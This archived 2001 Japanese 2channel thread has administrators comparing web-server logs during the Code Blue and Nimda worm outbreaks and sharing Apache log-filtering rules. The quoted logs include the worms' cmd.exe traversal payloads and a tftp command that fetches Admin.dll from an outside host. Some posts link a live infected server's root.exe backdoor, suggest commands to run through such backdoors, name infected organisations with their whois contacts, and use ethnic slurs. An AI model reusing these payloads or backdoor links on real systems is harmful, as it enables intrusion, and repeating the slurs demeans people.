5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

◆Code Blue◆ 2000厨は逝ってよし

1 :名無しさん@お腹いっぱい。:01/09/19 00:02
参照
http://www.zdnet.co.jp/help/howto/security/v08/02.html
http://www.isskk.co.jp/support/techinfo/general/codebluej_xforce.html

関連スレ
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997783469

2 :名無しさん@お腹いっぱい。:01/09/19 00:07
リターンヘッダを見るようにコードを修正しろ。

3 :名無しさん@お腹いっぱい。:01/09/19 00:12
Code赤がいくらか落ちついたと思ったら 今度は青だってか。
トラフィックが無茶増えて苦しいぞ、うちの回線。

4 :名無しさん@お腹いっぱい。:01/09/19 00:16
なんか勢い増してきたみたい・・。鬱だ

5 :名無しさん@お腹いっぱい。:01/09/19 00:15
ISSには
>Code Blueは対象にHTTP HEAD照会を送信し、対象からのレスポンスを検査します。
>IISがインストールされていることが分かると、Code BlueはHTTP GET要求を送信し、

って書いてあるけど、今来てるやつらはいきなりGET投げて来るから亜種だと思う。

6 :名無しさん@お腹いっぱい。:01/09/19 00:19
MSNがやられましたw
topを読むと送られてきます。
http://www.msn.co.jp/readme.eml

7 :しみじみクン:01/09/19 00:22
ところで…てゆうか、はあ…もうカンベンしてほしいね。新鮮味もなにもないよ…

8 :前スレ782:01/09/19 00:27
秋の新作ってトコかな (藁

9 :名無しさん@お腹いっぱい。:01/09/19 00:31
では、前回の反省を活かしてIPは晒しアリの方向で。

10 :名無しさん@お腹いっぱい。:01/09/19 00:35
/_mem_bin/..%5c../..%5c..
/_vti_bin/..%5c../..%5c..
あー、来てる来てる。こいつかあ。

11 :名無しさん@お腹いっぱい。:01/09/19 00:38
www4.jvnet.or.jp
↑こっからも飛んでくる。。。。。
こんなプロバイダには加入したくないものだ。。。。

12 :8:01/09/19 00:38
参考:
http://memo.st.ryukoku.ac.jp/archive/200109.month/1197.html

13 :名無しさん@お腹いっぱい。:01/09/19 00:45
また祭り?

14 :名無し:01/09/19 00:48
私の所には いまのところ
203.***.***.*** しかこないですよ みなさんは?

15 :名無しさん@お腹いっぱい。:01/09/19 00:51
不正アクセス禁止法で告訴したい!!!

16 :名無しさん@お腹いっぱい。:01/09/19 00:52
202.xxx.xxx.xxx なIPに鯖があるんだが、JPドメインからどんどん来るね

17 :名無しさん@お腹いっぱい。:01/09/19 00:52
>>14
自分のIPがそうなんじゃないの?

18 :8:01/09/19 00:57
>>13
♪♪秋祭り♪♪

今回の奴は鯖のHTMLも書き換え、IE使ってる人にファイルをDLさせる
みたい。IEな人は MS01-020 のパッチ当てとくほうがいいね。
http://news.2ch.net/test/read.cgi?bbs=news&key=1000822776&ls=50

19 :名無し:01/09/19 01:04
>>そうみたいです
 なんで?

20 :8:01/09/19 01:11
秋の新作の名は Nimda というらしい?
MSN関連スレの方が盛り上がってるね
http://www.trusecure.com/html/tspub/hypeorhot/rxalerts/tsa01024_cid177.shtml

21 :Codeラディン:01/09/19 01:12
テロ〜嫌い。
まぁ祭りになりそうですね〜

22 :名無しさん@お腹いっぱい。:01/09/19 01:15
うちにもさっきから怒濤のように来だしたよ。(極鬱

何事かと思って色々調べてたんだけど、2chはやっぱみんな早いねぇ(感心)
恥ずかしながら最初に来たのがニイハオのIPだったんで、慌ててIP蹴ってた。

で、これがBlue?
うちもいきなりGETから入っているんですが・・・

23 :8:01/09/19 01:19
どうも、Code Blueでは無さそう。
↑にリンクしたけど、17日に報告されてる新作のNimdaと思われ

24 :某CATV:01/09/19 01:22
Code BlueとCode Redとログはどう違うの?
最近、Zone Alarmがよけいに警告増えてきた(T_T)

25 :8:01/09/19 01:23
リンク追加:
http://securityresponse.symantec.com/avcenter/venc/data/w32.nimda.a@mm.html

26 :名無しさん@お腹いっぱい。 :01/09/19 01:24
CodeRedのアクセスログがかわいく見える…。

27 :40:01/09/19 01:25
<丶`∀´>ニムダ!

28 :8:01/09/19 01:30
>>24
ログの見え方的には
初代Code Redは NNNNNNNN ってNがいっぱい
Code Red2は XXXXXXXXXX ってXいっぱい
Code Blueは ・・・・よくわからん。
>>1の ISSKKのURL見てね

29 :Codeラディン:01/09/19 01:31
テロ〜嫌い。
まぁ祭りになりそうですね〜

30 :22:01/09/19 01:33
>>8 サンクス

31 :8:01/09/19 01:36
ISSの情報ではCode Blueが来たならばまずHEADメソッドの
ログがあるはずだからその辺で見分けられるでしょう。
#わたしゃApache使いなのでわからんのです

32 :8:01/09/19 01:49
コレの影響か、Code Red2が激減した。

CERTにも情報出たみたいだ。
http://www.cert.org/current/current_activity.html#port80

33 :名無しさん@お腹いっぱい。 :01/09/19 01:52
しかし飛んでくる量が赤虫&赤虫Uの比じゃないな。

同じIPから概出の穴を舐めるように1セットで飛んでくる。
そんなとこまで舐めちゃイやん(バカ)
"GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 404 215

34 :名無しさん@お腹いっぱい。:01/09/19 01:53
今度はどこの国が作ったのかね。おれはアメリカに100ペソ

35 :名無しさん@お腹いっぱい。:01/09/19 01:56
2週間食料供給が途絶えれば人が餓死する
可能性が増えるようなアフガンの人がWormを作れる
わけないだろし。そもそも電気だってまともになさげ。
いくらタイムリーだからってラディンと結びつけるのは
単純だと思われ。

36 :名無しさん@お腹いっぱい。:01/09/19 02:03
16:36:16 168.11.112.104 - GET /scripts/root.exe /c+dir 404 494 72 HTTP/1.0 - - -
なんてのが来た、ゲ、内側かとか思ってしまった。

37 :名無しさん@お腹いっぱい。:01/09/19 02:05
アタックがDNSサーバーらしきところからが多いんだけど、
DNSサーバーの穴掘られてるのかしらん。

38 :名無しさん@お腹いっぱい。:01/09/19 02:05
アメリカ・・・

39 :名無しさん@お腹いっぱい。:01/09/19 02:11
>>35
さては君誤爆だね?

40 : :01/09/19 02:11
昨晩10時から
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
の嵐。ほとんど韓国のIPだが、時に日本企業のもある。
何とかしてクレー。ページが重いよ。

41 :名無しさん@お腹いっぱい。 :01/09/19 02:12
>>34
ニムダ・・・ニムダ・・・ニ・ダ・・・ニダ・・・チョンじゃねーか(w

42 :能無し君:01/09/19 02:26
ああぁ、帯域半分食われてるよ。128Kしかないのに。
ここは、IIS無いんだから勘弁してよぉ〜。
IPが202.230.xx.xxだからなのか、キムチの国から
いっぱいいっぱいやってくる。
もうやめてぇ〜。鬱だし脳。

43 :名無しさん@お腹いっぱい。:01/09/19 02:28
まあキムチでも食ってマターリ逝こうよ

44 :名無しさん@お腹いっぱい。:01/09/19 02:31
16回アタックで1セット?

45 :能無し君:01/09/19 02:31
キムチ買いに逝ってきます。

46 :8:01/09/19 02:35
マータリ考えて
Apacheのな人向けのログ切り出しサンプル考えてみたです。
warmのゴミログとマトモなアクセスログと切り離せます

SetEnvIf Request_URI "default\.ida" warmlog
SetEnvIf Request_URI "cmd\.exe" warmlog
SetEnvIf Request_URI "root\.exe" warmlog
CustomLog /var/log/apache/warmlog combined env=warmlog
CustomLog /var/log/apache/accesslog combined env=!warmlog

さーて寝よ

47 :名無しさん@お腹いっぱい。:01/09/19 02:37
pc201.hellobox.co.jpからの攻撃が立て続けに来ている。
はっきりいってウザイ・・・

48 :名無しさん@お腹いっぱい。 :01/09/19 02:38
>>44
ログ見てみると、どうやらそのようだね。

49 :名無しさん@お腹いっぱい。:01/09/19 02:38
wormね

50 :名無しさん@お腹いっぱい。:01/09/19 02:40
>>49
わーむだす。

51 :49:01/09/19 02:44
>>50
???

>>46のスペルが違うな〜って思っただけ

52 :8:01/09/19 02:47
はずかしー。

s/warm/worm/

53 :50:01/09/19 02:47
>>51
ノッタだけなので・・スマソ
スペル?知りません(爆

54 :名無しさん@お腹いっぱい。:01/09/19 02:57
ログがお祭り状態。
確かに韓国からも多いけど、com、net、eduからの訪問も。

55 :名無しさん@お腹いっぱい。:01/09/19 03:00
いやいや、当方半分以上は日本の企業ですぜ。
なかにはinterqもはいってるんだけど、、、
おまえISPのくせになにやってんだゴルァ

56 : :01/09/19 03:02
INTERLINKもISPのくせに自分とこのwwwに感染。顧客を攻撃中ダヨ。

57 :そろコテ:01/09/19 03:05
さすがにもう噂になっているのね。

おれはAN-HTTPDだけど、1時間ほど放っておいて飯を食べていたら、タスクバーが
ビカビカ光っているのを見てびびってしまった。

しかし、よく来るね。
基本的にCGIの動作確認用に使っているだけなので、そろそろポート80を閉じて
しまおう。ログ見るのあきた。

58 :名無しさん@お腹いっぱい。:01/09/19 03:06
理研ビニル工業株式会社だと

59 :名無しさん@お腹いっぱい。:01/09/19 03:10
dns1.****.co.jpやら
ns.****.co.jpとかからバンバン来る・・・

60 :名無しさん@お腹いっぱい。:01/09/19 03:19
多いなあ。2時台だけで21件。

61 :名無しさん@お腹いっぱい。:01/09/19 03:26
同じホストからなんども来るねえ・・・

62 : :01/09/19 03:33
うちには2−3分ごとに8発づつくる!

63 :名無しさん@お腹いっぱい。:01/09/19 04:29
ウチはLINUXサーバですが
ドキュメントルートにc/winnt/system32/とフォルダをつくり
cmd.exeという名前でブラクラを置きました・・・
接続してくるサーバはリソース消費して落ちないのでしょうか
落ちてくれないと気が付かないのでしょうね・・・

64 :名無しさん@お腹○っぱい:01/09/19 04:51
落ちるのはそのブラクラに対応したブラウザで接続してきたお方でございます。
カウンタでも作りましょう。わーむちゃんのログを隔離して解析するもよし。

65 :名無しさん@お腹いっぱい。:01/09/19 05:29
18/Sep/2001/22:34.21 からXXXXXXXがほとんどなくなって...

/scripts/root.exe? の類の嵐。種類はいっぱい
ダミーのroot.exeを置いてるけど。誰か探ってんのかなと思ったら
来る奴みんな探っていってるから、これがblueかな?
本格的に始まったみたい

66 :名無しさん@お腹いっぱい。:01/09/19 05:36
HostnameLookups Double
にしてて ほとんどIPアドレスのままなんだけど
httpd-access.logとかに
HostNameにうまく変える方法ないですか?

67 :名無しさん@お腹いっぱい。:01/09/19 05:39
>>56
詳細きぼん♪

68 :名無しさん@お腹いっぱい。:01/09/19 05:47
>>66

logresolve とかどうですか?

logresolve is a post-processing program to resolve IP-
adresses in Apache's access logfiles. To minimize impact
on your nameserver, logresolve has its very own internal
hash-table cache. This means that each IP number will only
be looked up the first time it is found in the log file.

69 :名無しさん@お腹いっぱい。:01/09/19 06:31
>>65
赤虫のときに、ダミー置くとIISと判断されて集中砲火を食らう、という事例があったけど、
青虫ではどうなんだろうか?

70 :仕様無しさん ◆NwLv.g/w :01/09/19 06:53
>68
負荷の問題ではなくそもそも逆引きがDNS登録されていないだけだから
それでは役に立たないと思われ。。

71 :名無しさん@お腹いっぱい。:01/09/19 07:12
KDDIS ゴラァ
何が「KDDIの日本橋AP内に設置するため、空調・電源は万全です。」だ!!!
てめぇんとこの鯖がワームに感染してんじゃねーよ
確かにセキュリティー・ウィルス対策していますとは書いてねーけど。
管理者クビポンにしろ

http://www.kddis.ne.jp/new2/top.html

72 :8:01/09/19 08:25
Nimdaの続報 日本語版登場です
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.nimda.a@mm.html

73 :名無しさん@お腹いっぱい。:01/09/19 08:57
こんな所からも来ました。

Domain Information: [ドメイン情報]
a. [ドメイン名] IISR.GR.JP
e. [そしきめい] いんたーねっとじょうほうせんりゃくけんきゅうしょ
f. [組織名] インターネット情報戦略研究所
g. [Organization] Internet Information Strategy Research Institute
k. [組織種別] 任意団体
l. [Organization Type] Group
m. [登録担当者] SA1256JP
n. [技術連絡担当者] SA1256JP
p. [ネームサーバ] ns1.iisr.gr.jp
p. [ネームサーバ] ns1.nava21.ne.jp
p. [ネームサーバ] ns3.nava21.ne.jp
y. [通知アドレス] asano@iisr.gr.jp
[状態] Connected (2002/03/31)
[登録年月日] 2000/10/03
[接続年月日] 2000/10/30
[最終更新] 2001/03/19 16:05:44 (JST)
n-nakako@nava21.co.jp

74 :名無しさん@お腹いっぱい。:01/09/19 10:22
ここの名前(・∀・)イイ
ニムダアタック晒し

Domain Information: [ドメイン情報]
a. [ドメイン名] KIDDYLAND.CO.JP
e. [そしきめい] かぶしきがいしゃきでいらんど
f. [組織名] 株式会社 キデイランド
g. [Organization] KIDDY LAND CO.,LTD
k. [組織種別] 株式会社
l. [Organization Type] Corporation
m. [登録担当者] SA235JP
n. [技術連絡担当者] KS1250JP
p. [ネームサーバ] ns.kiddyland.co.jp
p. [ネームサーバ] s-field1.sunfield.ne.jp
y. [通知アドレス] nsp-addr@sunfield.ne.jp
[状態] Connected (2002/03/31)
[登録年月日] 1997/12/02
[接続年月日] 1998/02/02
[最終更新] 2000/02/14 09:51:41 (JST)
nsp-addr@sunfield.ne.jp

75 :65:01/09/19 10:40
これで1セットみたいよ
- -> /c/winnt/system32/cmd.exe
- -> /d/winnt/system32/cmd.exe
- -> /scripts/..%5c../winnt/system32/cmd.exe
- -> /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
- -> /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
- -> /msadc/..%5c../..%5c../..%5c/..\xc1^\../..\xc1^\../..\xc1^\../winnt/system32/cmd.exe
- -> /scripts/..\xc1^\../winnt/system32/cmd.exe
- -> /scripts/..\xc0/../winnt/system32/cmd.exe
- -> /scripts/..\xc0\xaf../winnt/system32/cmd.exe
- -> /scripts/..\xc1\x9c../winnt/system32/cmd.exe
- -> /scripts/..%5c../winnt/system32/cmd.exe
- -> /scripts/..%5c../winnt/system32/cmd.exe
- -> /scripts/..%5c../winnt/system32/cmd.exe
- -> /scripts/..%2f../winnt/system32/cmd.exe

76 :名無しさん@お腹いっぱい。:01/09/19 10:44
こんなニュースめっけた。
http://www.zdnet.co.jp/news/0109/12/e_codeblue.html

77 :名無しさん@お腹いっぱい。:01/09/19 10:46
http://www.zdnet.co.jp/broadband/0109/07/codegreen.html

bule green どれがどれ?

78 :d:01/09/19 11:29
これメチャメチャおもろい!
http://www.security.nl/misc/codered-stats/geodist.gif

79 :しね:01/09/19 11:34
俺もあまりに頭にきたのでさらします
203.141.185.132 - - [18/Sep/2001:22:27:17 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 282
Domain Information: [ドメイン情報]
a. [ドメイン名] OFFICETOKYO.CO.JP
e. [そしきめい]
f. [組織名] 東京事務所有限会社
g. [Organization] TOKYO JIMUSHO Co.,Ltd.
k. [組織種別] 有限会社
l. [Organization Type] Company
m. [登録担当者] TF198JP
n. [技術連絡担当者] TF198JP
p. [ネームサーバ] dns1.officetokyo.co.jp
p. [ネームサーバ] mars.kcom.ne.jp
y. [通知アドレス]
[状態] Connected (2002/03/31)
[登録年月日] 1997/03/28
[接続年月日] 1997/04/15
[最終更新] 1998/06/09 19:04:59 (JST)
Sunabe@kddcom.co.jp

80 :名無しさん@お腹いっぱい。:01/09/19 11:48
http://kanko.maizuru-bay.or.jp/
もやばいです。
おそらくNimdaでしょう。
皆さんアクセスしないようにしましょう。

81 :名無しさん@お腹いっぱい。:01/09/19 12:00
へ〜CodeBlueかぁ・・・と思ってウチのApacheのログ見たら

GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274 "-" "-"
GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 "-" "-"
GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 "-" "-"
GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 "-" "-"
GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 "-" "-"
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331 "-" "-"
GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281 "-" "-"
GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281 "-" "-"
GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"

ぎっしりこれで埋まってた。ようやくCodeRedが収まってきたと思ったら・・・。
ていうかこれCodeRed全盛の時よりももっとたくさんきてる気がするよ。

82 :名無しさん@お腹いっぱい。:01/09/19 12:05
>>63
/c/winnt/system32/cmd.exe があると4発増える

GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20210.145.120*%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0
GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20210.145.120*%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0
GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20210.145.120*%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0
GET /c/Admin.dll HTTP/1.0

83 :名無しさん@お腹いっぱい。:01/09/19 12:26
>>82
ん?どういう意味?

84 :名無しさん:01/09/19 12:42
ここもあった。
210.91.255.164

85 :対策済:01/09/19 12:52
211.185.177.1
66.125.116.35
211.196.186.105
202.62.120.21
211.186.149.122

86 :名無しさん@お腹いっぱい。:01/09/19 13:02
>>83
バックドアが見つかったと思ってAdmin.dllっつーのを
送り込もうとして来るみたい。

87 :名無しさん@お腹いっぱい。:01/09/19 14:22
なんだか一度にまとめて同一IPからぶっ放してくると思うと
その後はしばらく止んだり・・・と攻撃が散漫ですね

せめて韓国からのアクセスだけでも蹴れないもんでしょうかね、ふぅ。

88 :名無しさん@お腹いっぱい。:01/09/19 14:25
誰かが書いてたけど、Nimdaアクセスしてくるやつがcmd.exeを
ゲットしようとするならその名前のやばいファイル置いといて
反撃できないのかなぁ。

89 :名無しさん@お腹いっぱい。:01/09/19 14:35
>>88
CRcreanみたいなやつ?

90 :88:01/09/19 14:49
>>89
それどんなの?
Google検索でヒットせず・・・。

91 :名無しさん@お腹いっぱい。:01/09/19 14:57
つーか、これってCodeBlue??Nimda??
混乱してきた。

92 :名無しさん@お腹いっぱい。:01/09/19 14:58
>>90
「ネットを舞台にした赤と緑の対決」 by ZDNet
 ttp://www.zdnet.co.jp/broadband/0109/07/codegreen.html

93 :あぶねぇなぁ:01/09/19 15:08
>>88
>誰かが書いてたけど、Nimdaアクセスしてくるやつがcmd.exeを

Serverサイドで実行されると思われ。自滅してどうする。

94 :名無しさん@お腹いっぱい。:01/09/19 15:10
>>93
サーバーがIISじゃなきゃ問題ない、とか?

95 :88:01/09/19 15:17
>>92
べりさーんくす!いまから見てきます!
>>93
仕掛けるものにもよると思うけど、とりあえずうちはLinuxだから
平気です。

96 :名無しさん@お腹いっぱい。:01/09/19 15:24
>>91
Nimda。
CodeBlueもCodeRedも関係ない。
同じ脆弱性もついてるけど、より悪質。

http://www.ipa.go.jp/security/topics/newvirus/nimda.html

97 :test:01/09/19 16:19
話題からそれるけど、こんな記事があった。
http://headlines.yahoo.co.jp/hl?a=20010919-00052271-reu-int

98 :名無しさん@お腹いっぱい。:01/09/19 20:42
今度はCodeBlueが怒濤のごとくやってきます。困りました。

99 :8:01/09/19 22:59
>>46
/.jpにtypoった奴+αのが載っててたよ・・。
今更だけどAdmin.dllも含む改訂版を書いておきます。
#Admin.dllは普通だと来ないと思うけど

SetEnvIf Request_URI "default\.ida" wormlog
SetEnvIf Request_URI "cmd\.exe" wormlog
SetEnvIf Request_URI "root\.exe" wormlog
SetEnvIf Request_URI "Admin\.dll" wormlog

CustomLog /var/log/apache/warmlog combined env=wormlog
CustomLog /var/log/apache/accesslog combined env=!wormlog


100 :8:01/09/19 23:02
>>99
っていうかまたtypo。鬱だ。今度こそ

SetEnvIf Request_URI "default\.ida" wormlog
SetEnvIf Request_URI "cmd\.exe" wormlog
SetEnvIf Request_URI "root\.exe" wormlog
SetEnvIf Request_URI "Admin\.dll" wormlog

CustomLog /var/log/apache/wormlog combined env=wormlog
CustomLog /var/log/apache/accesslog combined env=!wormlog

101 :著作権違反のコリア皿仕上げ:01/09/20 00:53
http://210.178.224.129/

102 :test:01/09/20 01:18
こいつ、sadmine,codered,Nimdaブラザースにやられてる。
http://210.228.49.206/scripts/root.exe?/c%20dir%20c:\

103 :名無しさん@お腹いっぱい。:01/09/20 01:23
>>102
でもc:\tempにはreadme.exe居ないよ?

104 :名無しさん@お腹いっぱい。:01/09/20 03:03
>>103
c:\にreadme.emlがいる。OE経由の感染か。
base64になってるreadme.exeだね。

105 :名無しさん@お腹いっぱい。:01/09/20 03:24
210.131.179.1(kes1.kes.co.jp)
210.170.90.179(onmc004.p-ohnishi.co.jp)
210.170.67.130(ns1.tire24.com)
www.tire24.comも同じアドレスだけどつながんない。

106 :名無しさん@お腹いっぱい。:01/09/20 04:49
CodeRedなんぞ話にならないぐらいたくさん来ているのですが・・・>nimda

107 :名無しさん@ログいっぱい:01/09/20 06:34
# grep MSADC /var/log/httpd-access.log | cut -f 1 -d " " | sort | uniq -c | sort -n
(中略)
52 210.224.239.42
#

死んでくれ。

108 :名無しさん@お腹いっぱい。:01/09/20 09:17
どうしてみんなは
「Windowsが欠陥品である」
と言うことに気がつかない?

見ただけで勝手に何かを実行するなんて言う考えは
根本的に間違い。

こんな基地外であるMicro$oftは、早く潰れて下さい。
1番悪いのは、ビルゲイツです。
商売以外にももうちょっと頭使って下さい

で2番目にに悪いのが、ウィルス作成者。
いくらWindowsがショボイと言っても、
そんなことやってはいけません。

3番目に悪いのは、それに気がつかずM$製品を使う
厨房ユーザー

109 : :01/09/20 11:17
これってCodeBlue? Nimda?↓
[18/Sep/2001:22:58:22 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290

もうどっちだかわからん。

110 : :01/09/20 11:21
なんでもいいけどUNIXユーザに迷惑かける
のだけはやめてくれ>Win管理者厨
反省しる。

111 :test:01/09/20 11:50

http://IP/scripts/root.exe?/c+net+send+localhost+"警告!!このマシンにはオサマ・ビンラーディンが潜伏しています!!!"

112 :名無しさん@お腹いっぱい。:01/09/20 15:26
>>108
激しく同意するが、俺はUNIX使えん厨房(藁

113 :名無しさん@お腹いっぱい。:01/09/20 16:25
>>111
いかにも怪しいアドレスだ。
こんなとこに潜伏するわけね〜。幼稚なことするな。

114 :名無しさん@お腹いっぱい。:01/09/20 16:27
>>111
ってーか、、、マトリックスなのか??
NEO??

115 :名無しさん@お腹いっぱい。:01/09/20 19:13
大西君とスパイダーマンを何とかしてくれ
夕べから付きまとわれて五月蝿いYO

onmc004.p-ohnishi.co.jp
spider.comcom.co.jp

しかもCOMCOMってやたら怪しいし

116 :名無しさん@お腹いっぱい。:01/09/20 20:37
>>112
俺もだよ・・・みんなゴメン。ウイルスには感染してないはずだけど。

117 :え〜ん ◆EeeenOwI :01/09/20 21:49
反省汁の次のスレってこれでいいの?

118 :名無しさん@お腹いっぱい。:01/09/20 22:50
>>117
多分そうなんでしょう。
でも、今や話題がNimdaに・・・

119 :え〜ん ◆EeeenOwI :01/09/20 23:19
>>118
サンクス
違うスレに書いてシマタヨ

うちの進行スレの紹介どうしたらいいと思う?
コードブルーのgifとか、nimdaのgifなど作るようですかね?

あとめんどいからindex.htmlをCD−ROMにしたよ。
万が一書き換えられたらメンドイんで。
これって、有効?↑

120 :名無しさん@お腹いっぱい。:01/09/20 23:39
>>119

すいません。ちょっと意味がわかんないっす。
進行スレはこのスレ?
indexはどこのindexですか?

121 :え〜ん ◆EeeenOwI :01/09/20 23:57
>>120
説明不足スマンカッタ
コードレッドが出たときUPしたサイト。
http://isweb24.infoseek.co.jp/computer/titikun/CRhuri.htm

index.htmlは漏れの関係してる(管理してる)鯖のこと。
CD−ROMならそう簡単に書き換えられないかな〜と思って。

122 :名無しさん@お腹いっぱい。:01/09/21 00:16
>>121
え〜ん氏に質問っす。
今回は某テレビ局からの取材申し込みないの〜?

123 :え〜ん ◆EeeenOwI :01/09/21 00:34
>>122
しょっぱなにバックドア開いてるやつの入り方とか
漏れの感染させたPCを、いじくってるとこ見てもら
ったらいきなり引いたみたい・・・(^▽^ケケケ
それで放送はあんな風にさらっと逝った。

全然危機感なかったでしょ、放送見ても
漏れが被害者の振りして作っても良かったんだけど
なんせトロイのGUIまで見せたら引いちゃったのよ。
漏れやりすぎたみたい。

124 :え〜ん ◆EeeenOwI :01/09/21 00:39
漏れって某国営放送局のブラックリストに載った?

125 :名無しさん@お腹いっぱい。:01/09/21 01:04
>>121
確かにCDにしちゃうと書き換えは無理っぽいっすね。
単にプロパティで読み取り属性付けるだけじゃダメかな?

しかし一般の人ってどうしてこんなに危機感ないんだろう?
>>123見ると、NHKも見て見ぬフリっぽいし。
あんまり大げさにやると無知なヤツらがパニくるから?

126 :122:01/09/21 01:17
>>え〜ん氏
えーもしかして放送済!?
鬱だ。。見逃しちまった。。。。
PCいじくるって何やったのかトッテモ気になるぞ・・・

127 :IIS厨房@実行はスクリプトのみ:01/09/21 02:13
漏れも見逃した。
エーン。

※HTTP立ててるとプロキシ使用とか言われるので鬱

128 :え〜ん ◆EeeenOwI :01/09/21 07:35
オハヨ
>>126-127
見逃してもどうってことないよ。
見た人は判ってると思うが。
それに漏れは出てないし。

打ち合わせの段階で123をやったもんだから
詳しい放送は問題になると思ったのかな?

>>126
9/4だったよな確か
PCいじくるのは、実際にトロイの木馬って見たことありますか?
って聞いたらないって言うからGUIの木馬で漏れのディスク
トップを見せてあげただけ。

129 :え〜ん ◆EeeenOwI :01/09/21 07:40
その担当者、反省汁板を見てたようなのYO
だからあんまり書けなかった。

130 :破約、遣ってくれ:01/09/24 05:04
[2001/09/24 3:58:04] --unknown-- from: 202.132.46.28 /
[2001/09/24 3:58:10] --unknown-- from: 202.132.46.28 /
[2001/09/24 4:22:22] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:23] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:23] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:23] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:24] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:24] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:25] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:25] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:26] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:26] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:27] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:27] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:28] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:28] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:29] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:29] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:39:38] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:39:39] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:39:39] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:39:40] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:39:40] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:39:41] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:39:41] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:39:42] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:39:42] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:39:43] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:39:43] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:39:44] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:39:44] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:39:45] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:39:45] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:39:45] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
